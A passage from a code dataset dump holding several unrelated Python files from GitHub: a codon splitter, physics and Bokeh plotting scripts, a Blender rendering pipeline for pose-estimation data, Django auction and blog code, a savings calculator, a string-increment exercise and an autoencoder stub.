sequence[abs(n)-1:]\n count = 0\n while True:\n if len(sequence) < 3:\n break\n current = sequence[:3]\n if isStopCodon(current):\n count += 1\n sequence = sequence[3:]\n return count\n\n\ndef codons(sequence, n):\n '''\n return string representation of splitting in codon\n :param sequence:\n :param n:\n :return:\n >>> seq = 'TTTACTATAGTGATAGCCGGTAACATAGCTCCTAGAATAAAGGCAACGCAATACCCCTAGG'\n >>> codons(seq, +1)\n 'TTT-ACT-ATA-GTG-ATA-GCC-GGT-AAC-ATA-GCT-CCT-AGA-ATA-AAG-GCA-ACG-CAA-TAC-CCC-TAG-G'\n >>> codons(seq, +2)\n 'T-TTA-CTA-TAG-TGA-TAG-CCG-GTA-ACA-TAG-CTC-CTA-GAA-TAA-AGG-CAA-CGC-AAT-ACC-CCT-AGG'\n >>> codons(seq, +3)\n 'TT-TAC-TAT-AGT-GAT-AGC-CGG-TAA-CAT-AGC-TCC-TAG-AAT-AAA-GGC-AAC-GCA-ATA-CCC-CTA-GG'\n >>> codons(seq, -1)\n 'CCT-AGG-GGT-ATT-GCG-TTG-CCT-TTA-TTC-TAG-GAG-CTA-TGT-TAC-CGG-CTA-TCA-CTA-TAG-TAA-A'\n >>> codons(seq, -2)\n 'C-CTA-GGG-GTA-TTG-CGT-TGC-CTT-TAT-TCT-AGG-AGC-TAT-GTT-ACC-GGC-TAT-CAC-TAT-AGT-AAA'\n >>> codons(seq, -3)\n 'CC-TAG-GGG-TAT-TGC-GTT-GCC-TTT-ATT-CTA-GGA-GCT-ATG-TTA-CCG-GCT-ATC-ACT-ATA-GTA-AA'\n '''\n if n < 0:\n sequence = reverseComplement(sequence)\n if sequence[:abs(n)-1]:\n l_sequence = [sequence[:abs(n)-1]]\n else:\n l_sequence = []\n sequence = sequence[abs(n)-1:]\n while True:\n if len(sequence) < 3:\n if sequence:\n l_sequence.append(sequence)\n break\n l_sequence.append(sequence[:3])\n sequence = sequence[3:]\n final = '-'.join(l_sequence)\n return final\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()","repo_name":"isk02206/python","sub_path":"informatics/partial-examination-term-1-august-2017-ga-hyun-choi/stop-codons.py","file_name":"stop-codons.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11590535488","text":"\"\"\"\nThis script combines all the output files made by epicycle_analysis.py (i.e. kappa.dat)\nfor different values of spin and plots them on the same graph.\nCall it from the directory containing the directories of each simulation with different spin.\n\"\"\"\n\nfrom bash import BASH\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom oscillation_frequencies import kappa, kappa_r0\n\nd_neg = BASH('ls -dr spin-neg*/').split('\\n')\nd_zer = BASH('ls -d spin-zero*/').split('\\n')\nd_pos = BASH('ls -d spin-pos*/').split('\\n')\ndirectories = d_neg+d_zer+d_pos\n\nfig_width_pt = 240*3 # Get this from LaTeX using \\showthe\\columnwidth\ninches_per_pt = 1.0/72.27 # Convert pt to inches\ngolden_mean = (np.sqrt(5)-1.0)/2.0 # Aesthetic ratio\nfig_width = fig_width_pt*inches_per_pt # width in inches\nfig_height = fig_width*golden_mean # height in inches\nfig_size = [fig_width,fig_width]\n# fig_size = [3.3208800332088004, 2.0524167330839185]\nplt.style.use('paper')\n\n# colormap = plt.cm.nipy_spectral #I suggest to use nipy_spectral, Set1,Paired\ncolormap = plt.cm.terrain\n# fig1 = plt.figure(1,figsize=(15,10))\n# fig2 = plt.figure(2,figsize=(15,10))\nfig1 = plt.figure(1)\nfig2 = plt.figure(2)\nax = fig1.add_subplot(111)\nax2= fig2.add_subplot(111)\nax.set_color_cycle([colormap(i) for i in np.linspace(0, 0.25,len(directories))])\nax2.set_color_cycle([colormap(i) for i in np.linspace(0, 0.25,len(directories))])\n\nfor d in directories:\n try:\n f = d+'kappa.dat'\n print('Loading: '+f)\n data = np.loadtxt(f)\n extraD = np.loadtxt(d+'extra-data-point/kappa.dat')\n data = np.concatenate((np.array([extraD]),data),axis=0)\n print(' |--> Success')\n except:\n print(' |--> Failed')\n continue\n i = 0\n for line in open(f):\n if i==0: a=float(line.strip(\"#\").strip())\n if i==1:\n df=float(line.strip(\"#\").strip())\n break\n i+=1\n r = data[:,0]\n k = data[:,1]\n k_exact = data[:,2]\n plt.figure(1)\n # p = plt.plot(r,k,'x')\n p = plt.errorbar(r,k,yerr=df/2,fmt='.')\n print(df/2./k_exact)\n c = p[0].get_color()\n # plt.plot(r,k_exact,label=\"a = \"+str(a),color=c)\n r0 = kappa_r0(a)\n rfine=np.linspace(r0,20.,500)\n plt.plot(rfine,kappa(rfine,a),label=r\"$a = $\"+str(a).rjust(4),color=c,lw=1)\n # plt.plot(rfine,kappa(rfine,a),label=\"a = \"+str(a),color='k')\n plt.figure(2)\n plt.plot(r,np.abs(kappa(r,a)-k)/kappa(r,a),'o-')\n\nplt.yscale('log')\nplt.figure(1)\n\n# plt.tick_params(axis='both', which='major', labelsize=lbfs)\nplt.xlabel(r'$r$')\nplt.ylabel(r'$\\kappa$')\nplt.xlim(xmax=20)\nplt.ylim(ymin=0)\nplt.legend(frameon=False,loc='upper right')\n# plt.tight_layout()\n\nplt.savefig('python_plot.pdf',bbox_inches='tight')\n\nplt.show()\n","repo_name":"phantomSPH/phantom-geodesic","sub_path":"scripts/epicycle_multi-spin.py","file_name":"epicycle_multi-spin.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74920093861","text":"import os, sys\nfrom os.path import join, dirname, basename, exists\nimport shutil\nimport bpy\nfrom mathutils import Matrix, Vector\nfrom PIL import Image\nfrom math import radians, sin, cos\nimport numpy as np\nimport random\nimport json\n\ncur_dir = dirname(os.path.abspath(__file__))\nsys.path.append(cur_dir)\nfrom image_utils import obtain_obj_center, one_mask_per_image, binary_mask\nfrom render_utils import remove_obj_lamp_and_mesh, setup_env, make_lamp, render_without_output\n\n\n# Transform the R and T from numpy array to Matrix\ndef convert_pose_array_to_matrix(R, T):\n mat = Matrix(R.reshape(3, 3)).to_4x4()\n mat.col[3][:3] = T\n return mat\n\n\n# Setup the camera\ndef setup_camera(scene, fx=572, fy=574, cx=325, cy=242):\n cam = scene.objects['Camera']\n width = scene.render.resolution_x\n height = scene.render.resolution_y\n cam.data.sensor_height = cam.data.sensor_width * height / width\n cam.data.lens = (fx + fy) / 2 * cam.data.sensor_width / width\n cam.data.shift_x = (width / 2 - cx) / width\n cam.data.shift_y = (cy - height / 2) / width\n # change to OpenCV camera coordinate system\n cam.matrix_world = Matrix(((1.0, 0.0, 0.0, 0.0),\n (0.0, -1.0, 0.0, 0.0),\n (0.0, 0.0, -1.0, 0.0),\n (0.0, 0.0, 0.0, 1.0)))\n return cam\n\n\n# Add material to object\ndef add_color(obj, color=(1., 0., 0.), shadeless=True):\n mat = bpy.data.materials.new(name='Material')\n mat.use_shadeless = shadeless\n mat.diffuse_color = color\n if obj.data.materials:\n obj.data.materials[0] = mat\n else:\n obj.data.materials.append(mat)\n\n\n# Add texture map to object\ndef add_texture_map(obj, texture_img):\n mat = bpy.data.materials.new(name='Material')\n tex = bpy.data.textures.new('UVMapping', 'IMAGE')\n tex.image = bpy.data.images.load(texture_img)\n slot = mat.texture_slots.add()\n slot.texture = tex\n if obj.data.materials:\n obj.data.materials[0] = mat\n else:\n obj.data.materials.append(mat)\n\n\n# Import 3D models from .obj files\ndef import_models(model_files, category, use_defalut_texture=False):\n models = {}\n textures = {}\n repeat_count = {}\n for i in range(len(model_files)):\n models[i] = {}\n model_file = model_files[i]\n bpy.ops.import_scene.obj(filepath=model_file)\n file_name = basename(model_file).split('.')[0]\n\n if category:\n model_name = join(basename(dirname(model_file)), file_name)\n else:\n model_name = file_name\n models[i]['model_name'] = model_name\n\n if file_name not in repeat_count.keys():\n repeat_count[file_name] = 0\n else:\n repeat_count[file_name] += 1\n models[i]['object_name'] = file_name if repeat_count[file_name] == 0 else '{}.{:03d}'.format(\n file_name, repeat_count[file_name])\n\n if use_defalut_texture:\n textures[model_name] = model_file.replace('.obj', '.png')\n return models, textures\n\n\n# Create random rotation matrix\ndef rand_rotation():\n # from http://www.realtimerendering.com/resources/GraphicsGems/gemsiii/rand_rotation.c\n\n theta, phi, z = np.random.uniform(size=(3,))\n theta = theta * 2.0 * np.pi # Rotation about the pole (Z).\n phi = phi * 2.0 * np.pi # For direction of pole deflection.\n z = z * 2.0 # For magnitude of pole deflection.\n\n # Compute a vector V used for distributing points over the sphere\n # via the reflection I - V Transpose(V). This formulation of V\n # will guarantee that if x[1] and x[2] are uniformly distributed,\n # the reflected points will be uniform on the sphere. Note that V\n # has length sqrt(2) to eliminate the 2 in the Householder matrix.\n\n r = np.sqrt(z)\n V = (\n np.sin(phi) * r,\n np.cos(phi) * r,\n np.sqrt(2.0 - z)\n )\n\n st = np.sin(theta)\n ct = np.cos(theta)\n\n R = np.array(((ct, st, 0), (-st, ct, 0), (0, 0, 1)))\n\n # Construct the rotation matrix ( V Transpose(V) - I ) R.\n\n M = (np.outer(V, V) - np.eye(3)).dot(R)\n return M\n\n\nclass RenderMachine:\n \"\"\"Creates a python blender render machine.\n\n model_files: a list containing all the obj files\n out_dir: where to save the render results\n table_file: 3D model of the table on which all objects could be placed\n hide_table: use the table model only when this arg is False\n texture_dir: directory containing the texture map images\n bg_dir: directory containing the background images\n dim_min: the minimum model dimension in mm\n dim_max: the maximum model dimension in mm\n grid: the distance between object models on the table\n rad: lamp radiance to adjust the lightness\n clip_end: rendering range in mm\n \"\"\"\n def __init__(self,\n model_files, out_dir, table_file='Platte.obj', texture_dir=None, bg_dir=None, category=False,\n dim_min=100, dim_max=150, rad=3000, clip_end=2000,\n fx=572, fy=574, cx=325, cy=242, height=480, width=640):\n # Setting up the environment\n remove_obj_lamp_and_mesh(bpy.context)\n self.scene = bpy.context.scene\n self.objs = bpy.data.objects\n self.depthFileOutput = setup_env(self.scene, True, False, height, width, clip_end)\n self.camera = setup_camera(self.scene, fx, fy, cx, cy)\n self.lamp = make_lamp(rad)\n self.rad = rad\n self.height, self.width = height, width\n self.fx, self.fy, self.cx, self.cy = fx, fy, cx, cy\n\n # Import table model and align it with camera frame\n bpy.ops.import_scene.obj(filepath=table_file)\n self.table = bpy.data.objects[basename(table_file).split('.')[0]]\n grid = np.random.uniform(dim_min, dim_max)\n self.offset = [0, -grid, grid, -2 * grid, 2 * grid, -3 * grid, 3 * grid]\n\n # Import 3D models and register dimension range\n model_files = random.choices(model_files, k=30) if len(model_files) > 30 else model_files\n self.models, self.textures = import_models(model_files, category)\n self.dim_min, self.dim_max = dim_min, dim_max\n\n # Read texture maps and the background images\n self.texture_dir = texture_dir\n self.textures = os.listdir(texture_dir)\n self.bg_dir = bg_dir\n self.bg_imgs = os.listdir(bg_dir)\n\n # Output setting\n self.out_dir = out_dir\n self.scene.render.image_settings.file_format = 'PNG'\n self.depthFileOutput.base_path = join(out_dir, 'depth')\n self.depthFileOutput.format.file_format = 'OPEN_EXR'\n\n # TODO: to modify in order to be complied with T-LESS where multiple objects are present\n def render_pose_from_annotation(self, idx, R, T):\n self.table.hide_render = True\n\n # Render object masks\n for i in range(len(self.models)):\n model = self.models[i]['object_name']\n if model in R:\n self.objs[model].hide_render = False\n self.objs[model].matrix_world = convert_pose_array_to_matrix(R[model], T[model])\n add_color(self.objs[model], color=((i + 1) * 0.01, (i + 1) * 0.01, (i + 1) * 0.01), shadeless=True)\n else:\n self.objs[model].hide_render = True\n\n self.scene.render.filepath = join(self.out_dir, '{:04d}_mask'.format(idx))\n self.depthFileOutput.file_slots[0].path = '{:04d}_depth_'.format(idx)\n render_without_output(use_antialiasing=False)\n\n # Render textured image and depth map\n for i in range(len(self.models)):\n model = self.models[i]['object_name']\n if model in R:\n add_texture_map(self.objs[model], self.textures[model])\n\n self.depthFileOutput.file_slots[0].path = '{:04d}_depth_'.format(idx)\n self.scene.render.filepath = join(self.out_dir, '{:04d}_image'.format(idx))\n render_without_output(use_antialiasing=True)\n\n def render_random_pose(self, annot, start_idx, scene_id, image_id, R, T, ele):\n \"\"\"\n Render objects under random poses\n :param annot: annotation dictionary\n :param start_idx:\n :param scene_id:\n :param image_id:\n :param R:\n :param T:\n :param ele:\n :return: annotation, rgb, mask, mask_visib, depth\n \"\"\"\n self.table.matrix_world = convert_pose_array_to_matrix(\n R, T + np.array([0, 200 * sin(radians(ele)), 200 * cos(radians(ele))])\n )\n self.table.scale = 6, 6, 6\n self.depthFileOutput.file_slots[0].path = '{:06d}_'.format(image_id)\n\n # Randomize the lamp energy\n self.lamp.data.energy = np.random.uniform(self.rad * 0.5, self.rad * 1.5) / 36\n\n # Render visible object masks\n Rotations, Translations, Scales = {}, {}, {}\n for i in range(len(self.models)):\n object = self.models[i]['object_name']\n R_model = rand_rotation()\n T_model = T + np.array(\n [self.offset[i % 5], sin(radians(ele)) * self.offset[i // 5], -cos(radians(ele)) * self.offset[i // 5]]\n )\n self.objs[object].matrix_world = convert_pose_array_to_matrix(R_model, T_model)\n add_color(self.objs[object], color=((i + 1) * 0.01, (i + 1) * 0.01, (i + 1) * 0.01), shadeless=True)\n scale = np.random.uniform(self.dim_min, self.dim_max) / max(self.objs[object].dimensions)\n self.objs[object].scale = scale, scale, scale\n Rotations[i], Translations[i], Scales[i] = R_model, T_model, scale\n\n add_color(self.table, color=(0, 0, 0), shadeless=True)\n self.scene.render.filepath = join(self.out_dir, 'mask_visib', '{:06d}'.format(image_id))\n render_without_output(use_antialiasing=False)\n bbox_visib, px_visib = one_mask_per_image(join(self.out_dir, 'mask_visib', '{:06d}.png'.format(image_id)),\n image_id, len(self.models))\n\n # Render amodal object masks\n bbox_amodal, px_amodal, truncated = [], [], []\n self.table.hide_render = True\n for i in range(len(self.models)):\n object = self.models[i]['object_name']\n self.objs[object].hide_render = True\n for i in range(len(self.models)):\n object = self.models[i]['object_name']\n self.objs[object].hide_render = False\n self.scene.render.filepath = join(self.out_dir, 'mask', '{:06d}_{:06d}'.format(image_id, i))\n render_without_output(use_antialiasing=False)\n bbox, px, trunc = binary_mask(join(self.out_dir, 'mask', '{:06d}_{:06d}.png'.format(image_id, i)))\n bbox_amodal.append(bbox)\n px_amodal.append(px)\n truncated.append(trunc)\n self.objs[object].hide_render = True\n\n # Render textured image and depth map\n self.table.hide_render = False\n for i in range(len(self.models)):\n object = self.models[i]['object_name']\n self.objs[object].hide_render = False\n for i in range(len(self.models)):\n object = self.models[i]['object_name']\n add_texture_map(self.objs[object], join(self.texture_dir, random.choice(self.textures)))\n\n # Generate the sample annotation\n if px_amodal[i] == 0 or px_visib[0] == 0:\n continue\n sample_frame = {}\n sample_frame[\"scene_id\"] = scene_id\n sample_frame[\"image_id\"] = image_id\n sample_frame[\"instance_id\"] = i\n\n sample_frame[\"model_name\"] = self.models[i]['model_name']\n sample_frame[\"scale\"] = Scales[i]\n sample_frame[\"cam_R_m2c\"] = list(Rotations[i].reshape(-1))\n sample_frame[\"cam_t_m2c\"] = list(Translations[i])\n cx, cy, inside = obtain_obj_center(Translations[i], self.fx, self.fy, self.cx, self.cy, self.height,\n self.width)\n sample_frame[\"obj_center\"] = [cx, cy]\n sample_frame[\"inside\"] = inside\n sample_frame[\"truncated\"] = truncated[i]\n sample_frame[\"bbox_obj\"] = bbox_amodal[i]\n sample_frame[\"bbox_visib\"] = bbox_visib[i]\n sample_frame[\"px_count_visib\"] = px_visib[i]\n sample_frame[\"visib_fract\"] = px_visib[i] / px_amodal[i]\n annot['{}'.format(start_idx + i)] = sample_frame\n\n add_texture_map(self.table, join(self.bg_dir, random.choice(self.bg_imgs)))\n self.scene.render.filepath = join(self.out_dir, 'rgb', '{:06d}'.format(image_id))\n render_without_output(use_antialiasing=True)\n\n # rename depth image\n shutil.move(join(self.depthFileOutput.base_path, '{:06d}_0001.exr'.format(image_id)),\n join(self.depthFileOutput.base_path, '{:06d}.exr'.format(image_id)))\n\n\nif __name__ == '__main__':\n import pandas as pd\n # input and output directory\n dataset_dir = '/home/xiao/Datasets/ABC'\n model_dir = join(dataset_dir, 'abc_0000')\n out_dir = join(dataset_dir, 'train_0000')\n scene_id = len(os.listdir(out_dir))\n out_dir = join(out_dir, '{:06d}'.format(scene_id))\n images_per_scene = 100\n\n # textures and backgrounds directory\n texture_dir = join(dirname(os.path.realpath(__file__)), 'textures')\n bg_dir = '/home/xiao/Datasets/PascalVOC/VOCdevkit/VOC2012/Images/JPEGImages'\n\n # TODO: consider mutilple instances of the same shape\n df = pd.read_csv(join(dataset_dir, 'abc_0000.txt'))\n df = df[df.ratio_max <= 5]\n df = df[df.ratio_min >= 0.2]\n model_number = np.random.randint(5, 25)\n idx = np.random.randint(0, len(df), size=(model_number,))\n model_files = [join(model_dir, '{}.obj'.format(df.iloc[i, 0])) for i in idx]\n\n render_machine = RenderMachine(model_files, out_dir, texture_dir=texture_dir, bg_dir=bg_dir, rad=3000)\n\n # Load table poses from the LINEMOD-OCCLUSION dataset\n table_poses = np.load('table_poses.npz')\n R = table_poses['R']\n T = table_poses['T']\n Ele = table_poses['Ele']\n idx = np.random.randint(0, R.shape[0], size=(images_per_scene,))\n\n # Read in annotation json file\n annotation_file = join(out_dir, 'scene_gt.json')\n annot = json.load(open(annotation_file)) if exists(annotation_file) else {}\n\n for i in range(len(idx)):\n start_idx = len(annot)\n render_machine.render_random_pose(annot, start_idx, scene_id, i, R[idx[i], :], T[idx[i], :], Ele[idx[i]])\n\n with open(annotation_file, 'w') as f:\n json.dump(annot, f, indent=4)\n\n os.system('rm blender_render.log')\n","repo_name":"YoungXIAO13/ObjectPoseEstimationSummary","sub_path":"blender_render/render_random_pose.py","file_name":"render_random_pose.py","file_ext":"py","file_size_in_byte":14542,"program_lang":"python","lang":"en","doc_type":"code","stars":663,"dataset":"github-code","pt":"35"} +{"seq_id":"72363403302","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom django.core.files.base import ContentFile\nimport requests\nfrom .models import User, Category, AuctionListing, Comment, Bid, Watchlist\nfrom decimal import Decimal\n\ndef index(request):\n return render(request, \"auctions/index.html\",{\n \"listings\" : AuctionListing.objects.all()\n })\n\ndef listing_page(request, list_id):\n listing_page = AuctionListing.objects.get(id = list_id)\n is_in_watchlist = False\n comments = Comment.objects.filter(listing=listing_page)\n comment_texts = [comment.comments for comment in comments]\n\n if request.user.is_authenticated:\n \n if Watchlist.objects.filter(watchlist=list_id, user=request.user):\n is_in_watchlist = True\n else:\n is_in_watchlist = False\n bid_by = Bid.objects.filter(bid_price=listing_page.current_price).last()\n if bid_by:\n bidder_user = bid_by.bidding_by\n else:\n bidder_user = None\n\n return render(request, \"auctions/listing_page.html\", {\n \"listing\" : listing_page ,\n \"is_in_watchlist\" : is_in_watchlist,\n \"owner_name\" : str(listing_page.owner).strip(),\n \"user_name\" : str(request.user.username).strip(),\n \"bid_by\" : str(bidder_user).strip(),\n \"comments\" : comment_texts\n })\n else:\n return render(request, \"auctions/listing_page.html\", {\n \"listing\" : listing_page ,\n \"is_in_watchlist\" : is_in_watchlist,\n \"owner_name\" : str(listing_page.owner).strip(),\n \"user_name\" : str(request.user.username).strip(),\n \"comments\" : comment_texts,\n })\n\n\n\ndef watchlist(request):\n if request.user.is_authenticated:\n user_watchlist = Watchlist.objects.filter(user=request.user)\n return render(request, \"auctions/watchlist.html\",{\n \"watchlistings\" : user_watchlist\n })\n\n\ndef add_watchlist(request, listing_id):\n if request.method == \"POST\":\n if request.user.is_authenticated:\n watchlist_page = AuctionListing.objects.get(id = listing_id)\n add_to_watchlist = Watchlist(watchlist=watchlist_page, user=request.user)\n add_to_watchlist.save()\n return redirect('listing_page', list_id=listing_id)\n else:\n return render(request, \"auctions/login.html\")\n \ndef remove_watchlist(request, listing_id):\n if request.method == \"POST\":\n if request.user.is_authenticated:\n watchlist_page = AuctionListing.objects.get(id = listing_id)\n get_from_watchlist = Watchlist.objects.get(watchlist=watchlist_page, user=request.user)\n get_from_watchlist.delete()\n return redirect('listing_page', list_id=listing_id)\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password) #In Django, registered users are typically saved in a database table called auth_user. This table is created and managed by Django's built-in authentication system and is part of the Django authentication framework.\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"auctions/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/register.html\")\n\ndef create(request):\n error_url = None\n if request.method == \"POST\":\n title = request.POST[\"title\"]\n description = request.POST[\"description\"]\n current_price = request.POST[\"current_price\"]\n category = Category.objects.get(id = int(request.POST[\"category\"]))\n image_url = request.POST[\"image\"]\n created_at = timezone.now\n owner = request.user\n \n try:\n image_request = requests.get(image_url, stream=True)\n image_request.raise_for_status()\n except requests.exceptions.RequestException as e:\n error_url = \"Re-Enter with the correct URL\"\n\n if error_url is not None:\n return render(request, \"auctions/create.html\", {\n \"error_url\" : error_url,\n \"categories\" : Category.objects.all()\n })\n else:\n listing = AuctionListing(title = title ,\n description = description,\n category = category,\n current_price = current_price, \n created_at = created_at,\n owner = owner,\n status = True)\n image_name = image_url.split(\"/\")[-1]\n image_content = ContentFile(image_request.content)\n listing.image.save(image_name, image_content, save=True)\n listing.save() \n return HttpResponseRedirect(reverse(\"index\"))\n\n else:\n return render(request, \"auctions/create.html\" ,{\n \"categories\" : Category.objects.all()\n })\n \ndef place_bid(request, listing_id):\n if request.method == \"POST\":\n if request.user.is_authenticated:\n new_price = request.POST[\"new_price\"]\n bid_by = request.user\n bid = Bid(bid_price=new_price, bidding_by=bid_by)\n bid.save()\n auction_listing = AuctionListing.objects.get(id=listing_id)\n if (Decimal(new_price) > auction_listing.current_price):\n auction_listing.current_price = new_price\n auction_listing.save()\n return redirect('listing_page', list_id=listing_id)\n else: \n listing_page = AuctionListing.objects.get(id = listing_id)\n is_in_watchlist = False\n if request.user.is_authenticated:\n if Watchlist.objects.filter(watchlist=listing_id, user=request.user):\n is_in_watchlist = True\n else:\n is_in_watchlist = False\n\n return render(request, \"auctions/listing_page.html\", {\n \"listing\" : listing_page ,\n \"is_in_watchlist\" : is_in_watchlist,\n \"owner_name\" : str(listing_page.owner).strip(),\n \"user_name\" : str(request.user.username).strip(),\n \"error_msg\": \"Bid with higher then the current price\"\n })\n else:\n\n return render(request, \"auctions/listing_page.html\", {\n \"listing\" : listing_page ,\n \"is_in_watchlist\" : is_in_watchlist,\n \"owner_name\" : str(listing_page.owner).strip(),\n \"user_name\" : str(request.user.username).strip(),\n \"error_msg\": \"Bid with higher then the current price\"\n })\n else:\n return render(request, \"auctions/login.html\")\n \ndef close_listing(request, listing_id):\n if request.method ==\"POST\":\n auction_listing = AuctionListing.objects.get(id=listing_id)\n\n if (auction_listing.owner == request.user):\n auction_listing.status = False\n auction_listing.save()\n return render(request, \"auctions/index.html\")\n\ndef comment(request,listing_id):\n if request.method ==\"POST\":\n listing = AuctionListing.objects.get(id=listing_id)\n comment = request.POST['comment']\n comment = Comment(commented_by = request.user, comments = comment, listing = listing)\n comment.save()\n return redirect('listing_page', list_id=listing_id)\n\ndef categories(request):\n category_name = Category.objects.all()\n # auctions = AuctionListing.objects.filter(category=category_name, person=person_name).order_by('id').reverse()\n return render(request, \"auctions/categories.html\",{\n \"categories\" : category_name\n })\n\ndef category_view(request,category): \n auctions = AuctionListing.objects.filter(category=category)\n if auctions:\n return render(request, \"auctions/category.html\",{\n \"listings\" : auctions,\n \"error_msg\": \"No entries in this category\"\n })","repo_name":"HEMANTH-HS-HUGO/Commerce","sub_path":"auctions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74990668261","text":"invval = 0#Savings starts out at 0\nperc = 9 #9 is the annual SP rate of return on average since 1930\npercSal = int(input(\"What percent do you expect your salary to increase annually?\"))\npercSav = int(input(\"What percent of your salary do you expect to put into your portfolio each year?\"))\nsal = int(input(\"What would your starting salary be?\"))\nyears = int(input(\"How many years would you be working for?\"))\nfor i in range(years):\n invval = invval*(1 + 9/100)#Savings natural appreciation\n invval = invval + sal*percSav/100#New amount added per year to savings\n sal = sal*(1 + percSal/100)#salary increase per year\ninvval = round(invval, 2)#Rounding so that we get value in cents\nsal = round(sal,2)#Rounding so that we get value in cents\nprint(\"Savings Value after \", years, \" years is $\", invval)\nprint(\"\\nSalary after \", years, \" years is $\", sal)\nprint(\"The expected income from this portfolio would be\", round(invval*.04,2), \"per year\")\n","repo_name":"C0smicCrush/Simple-Python-Savings-Calculator","sub_path":"savingscalc.py","file_name":"savingscalc.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18155588090","text":"def increment_string(strng):\n if len(strng) == 0: return '1'\n numbers = []\n index = -1\n if strng[-1] in '0123456789':\n if strng[-1] == '9':\n while True:\n index -= 1\n if strng[index] in '0123456789':\n if strng[index] == '0' or strng[index] == '9':\n if strng[index-1] == '0' or strng[index-1] == '9':\n index -= 1\n break\n else:\n break\n number = int(strng[index+1:]) + 1\n return f'{strng[:index+1]}{number}'\n else:\n number = int(strng[-1]) + 1\n return f'{strng[:-1]}{number}'\n else:\n return f'{strng}1'\n \n\n \n\n\nprint(increment_string('ola600833009879')) #not working (idk why), smt about 3009879","repo_name":"Kanefav/CodeWars","sub_path":"Challenge67.py","file_name":"Challenge67.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37663403654","text":"from bokeh.plotting import figure, output_file, show\n\noutput_file(\"varea.html\")\n\np = figure(plot_width=400, plot_height=400)\n\np.varea(x=[1, 2, 3, 4, 5],\n y1=[2, 6, 4, 3, 5],\n y2=[1, 4, 2, 2, 3])\n\nshow(p)\n","repo_name":"SoutiRini/Top-20-Python-Libraries","sub_path":"stuff/finished libraries/bokeh/plotting_varea.py","file_name":"plotting_varea.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"75327939619","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.PostList.as_view()),\n # path('/', views.single_post_page), # <자료형:변수명> -> single_post_page의 매개변수로 넘어간다.\n path('/', views.PostDetail.as_view()), # <자료형:변수명> -> single_post_page의 매개변수로 넘어간다.\n # path('', views.index)\n path('/add_comment/', views.add_comment),\n\n path('category//', views.show_category_posts),\n path('tag//', views.show_tag_posts),\n\n path('create_post/', views.PostCreate.as_view()),\n path('update_post//',views.PostUpdate.as_view() )\n]","repo_name":"auddus16/DjangoBlog","sub_path":"blog_main/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"75084436900","text":"# Simple 1 hot representation for each word. Append word vectors for length 10\n# long senctence eg. Encode into single matrix. Decode\n\nimport numpy as np\nfrom torch import relu,device, sigmoid, zeros\nfrom torch.utils.data import DataLoader\nfrom torch.nn import Linear, MSELoss, Module, CrossEntropyLoss, Softmax\nfrom torch.optim import Adam, SGD\n\ndef file_to_tag_list(filename):\n sentences = []\n with open(filename, 'r', encoding='utf8') as f:\n words = []\n for line in f:\n line = line.strip()\n\n if len(line) == 0: \n while len(words) < sentence_length:\n words.append(\"\")\n sentences.append(words[:sentence_length])\n words = []\n else:\n word, _ = line.split()\n vocab.add(word)\n words.append(word)\n return sentences\n\nvocab = set([\"\"])\nsentence_length = 10\n\ntrain_sentences = file_to_tag_list(\"train.conllu\")\ntest_sentences = file_to_tag_list(\"test.conllu\")\n\nw2i = {w:(i+1) for i,w in enumerate(vocab)}\nw2i[\"\"] = 0\n\ni2w = {i:w for w,i in w2i.items() } \n\nclass AE(Module):\n def __init__(self, vocab_size, sentence_length):\n super().__init__()\n features = vocab_size * sentence_length\n self.e_hidden = Linear(in_features=features,out_features=128)\n self.d_output = Linear(in_features=128, out_features=features)\n \n def forward(self, features):\n activation = self.e_hidden(features)\n activation = sigmoid(activation)\n activation = self.d_output(activation)\n return sigmoid(activation)\n\nmodel = AE(len(vocab), sentence_length)\n\nepochs = 10\noptimizer = SGD(model.parameters(), lr=5e-4)\ncriterion = MSELoss()\n\nfor epoch in range(epochs):\n loss = 0\n for sentence in train_sentences:\n sentence = [w2i[w] for w in sentence]\n\n inputs = zeros(sentence_length, len(vocab))\n\n for i in range(len(sentence)):\n idx = sentence[i]\n inputs[i][idx] = 1\n inputs = inputs.view(1, -1)\n\n 